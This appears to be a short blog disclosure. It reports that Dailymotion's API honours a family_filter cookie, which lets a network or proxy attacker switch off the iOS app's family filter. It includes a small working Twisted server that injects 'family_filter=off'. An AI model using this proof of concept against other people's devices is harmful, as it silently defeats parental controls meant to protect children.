The Dailymotion REST APIs currently honour the family_filter cookie that their user-facing website uses to manage filter settings. This makes the API, effectively, not RESTful because there is state involved.

The bigger implication however, is that injecting one cookie (family_filter=off) into your iPhone/iPad-application will fully disable the family filter for that client. This would be, I suspect, a violation of Apple App Store guidelines. Of course, if people do this for their own devices, nobody cares. However, this issue would allow a competent malicious third party (or a dedicated teenager ;)) to silently enable the viewing of adult material on a device that is expected to be family-safe.

Note that jailbreaking or similar hacks are not needed to exploit this issue. Hijacking traffic at the network level, or simply pointing the iPhone/iPad’s proxy configuration to a specifically prepared server, is enough.

(On a sidenote, the iPad/iPhone app uses an older REST API that does not conform to the current API docs and also does not use HTTPS, making this issue slightly easier to exploit).

Simple working example of such a specifically prepared server:

from twisted.web import server, resource
from twisted.internet import reactor

from twisted.python import log
import sys
log.startLogging(sys.stdout)

class Simple(resource.Resource):
    isLeaf = True
    def render_GET(self, request):
        request.addCookie(
            "family_filter",
            "off",
            path="/",
            expires="Tue, 24-Jan-2012 22:26:22 GMT"
        )
        return "{}"

site = server.Site(Simple())
reactor.listenTCP(8080, site)
reactor.run()

I doubt Dailymotion is the first or only iOS app that can be influenced by getting some cookies in. Will we see more of this?